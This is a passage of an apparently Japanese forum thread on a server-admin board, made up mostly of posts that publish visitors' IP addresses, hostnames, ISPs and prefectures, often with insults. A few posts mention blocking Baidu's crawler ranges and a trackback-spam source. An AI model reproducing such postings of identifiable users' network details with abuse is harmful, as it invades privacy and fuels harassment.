ホスト名 p2149-ipbf1001sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道
207DNS未登録さん:2013/12/19(木) 22:15:48.10 ID:??? BE:359142375-PLT(27717)
IPアドレス 126.209.132.45
ホスト名 pw126209132045.4.kyb.panda-world.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 携帯電話
都道府県 該当なし
208DNS未登録さん:2013/12/23(月) 19:42:03.74 ID:???
IPアドレス 220.247.10.107
ホスト名 static-220-247-10-107.b-man.svips.gol.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 該当なし

しつけーぞカスヤルァー!!
209DNS未登録さん:2013/12/27(金) 13:07:07.31 ID:???
アタックとはちょっと違うが
今話題の情報抜き取りサービス百度のクローラーが最悪なので
百度の割り当てIP範囲全てで弾いてる
210DNS未登録さん:2013/12/28(土) 00:53:14.16 ID:??? BE:184702436-PLT(27717)
IPアドレス 124.84.37.47
ホスト名 p4047-ipbf504sapodori.hokkaido.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道

死ねコラゴミクズ!!
211DNS未登録さん:2013/12/29(日) 16:23:58.18 ID:???
IPアドレス 219.104.230.145
ホスト名 hmmt105145.catv.ppp.infoweb.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 CATV
都道府県 静岡県

邪魔だよクズ!!
212DNS未登録さん:2013/12/30(月) 16:39:51.20 ID:???
IPアドレス 123.198.39.72
ホスト名 p7bc62748.szoknt01.ap.so-net.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 種別不明
都道府県 静岡県

邪魔だよクズ!!
213DNS未登録さん:2014/01/09(木) 22:53:48.84 ID:??? BE:215485373-PLT(27717)
IPアドレス 223.218.116.37
ホスト名 i223-218-116-37.s41.a002.ap.plala.or.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 山形県

しつけーぞカスヤルァー!!
214DNS未登録さん:2014/01/09(木) 22:59:07.04 ID:??? BE:256530555-PLT(27717)
IPアドレス 61.27.82.154
ホスト名 61-27-82-154.rev.home.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 011
接続回線 CATV
都道府県 北海道

おまえもだ!!
215DNS未登録さん:2014/01/12(日) 22:10:50.36 ID:??? BE:123134562-PLT(27717)
IPアドレス 126.121.2.38
ホスト名 softbank126121002038.bbtec.net
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道
216DNS未登録さん:2014/01/13(月) 01:19:54.90 ID:???
ユーザーID # 要注意人物2415[誹謗中傷サイトから来て掘ってくる輩]
ホスト名 # i114-180-180-98.s04.a001.ap.plala.or.jp
IPアドレス # 114.180.180.98

詮索してくんなよ屑!!
217DNS未登録さん:2014/01/13(月) 14:41:03.33 ID:???
IPアドレス 114.176.228.202
ホスト名 p25202-ipngn100401fukuokachu.fukuoka.ocn.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 福岡県
218DNS未登録さん:2014/01/15(水) 22:02:46.47 ID:???
a. [IPネットワークアドレス] 59.86.64.0/18
b. [ネットワーク名] TOKAI-NET
f. [組織名] 株式会社TOKAIコミュニケーションズ
g. [Organization] TOKAI Communications Corporation
m. [管理者連絡窓口] JP00078308
n. [技術連絡担当者] JP00078308
219DNS未登録さん:2014/01/19(日) 21:12:19.34 ID:???
IPアドレス 113.159.230.90
ホスト名 KD113159230090.ppp-bb.dion.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 北海道

またこいつか
しつけーぞカスヤルァー!!
220DNS未登録さん:2014/02/01(土) 00:45:41.44 ID:??? BE:410448858-PLT(27717)
IPアドレス 113.38.179.234
ホスト名 113x38x179x234.ap113.ftth.ucom.ne.jp
IPアドレス割当国 日本 ( jp )
市外局番 該当なし
接続回線 光
都道府県 該当なし
221DNS未登録さん:2014/09/17(水) 02:54:35.27 ID:???
http://maguro.2ch.net/test/read.cgi/mysv/1296570981/

ここの次スレとして使っていいのかな
222DNS未登録さん:2014/09/17(水) 04:17:16.46 ID:???
寝ぼけて書くと恥かくぞ
223DNS未登録さん:2014/09/17(水) 10:46:59.05 ID:???
誤爆とはいえ久しぶりに動いてたので

IP: 192.151.148.234
Host: 取得不可
日に数百回トラックバックスパムを試行してくる
224DNS未登録さん:2014/12/07(日) 13:06:47.58 ID:HrjB81yF
オー ヤッ!
デンデンデデン デンデンデデン デンデンデデン デン デン!
225DNS未登録さん
えっちぃ絵をリクエストすると誰かが描いてくれるかもしれない素敵なスレ【R-18】
http://hayabusa.o p e n 2ch.net/test/read.cgi/news4vip/1423739321/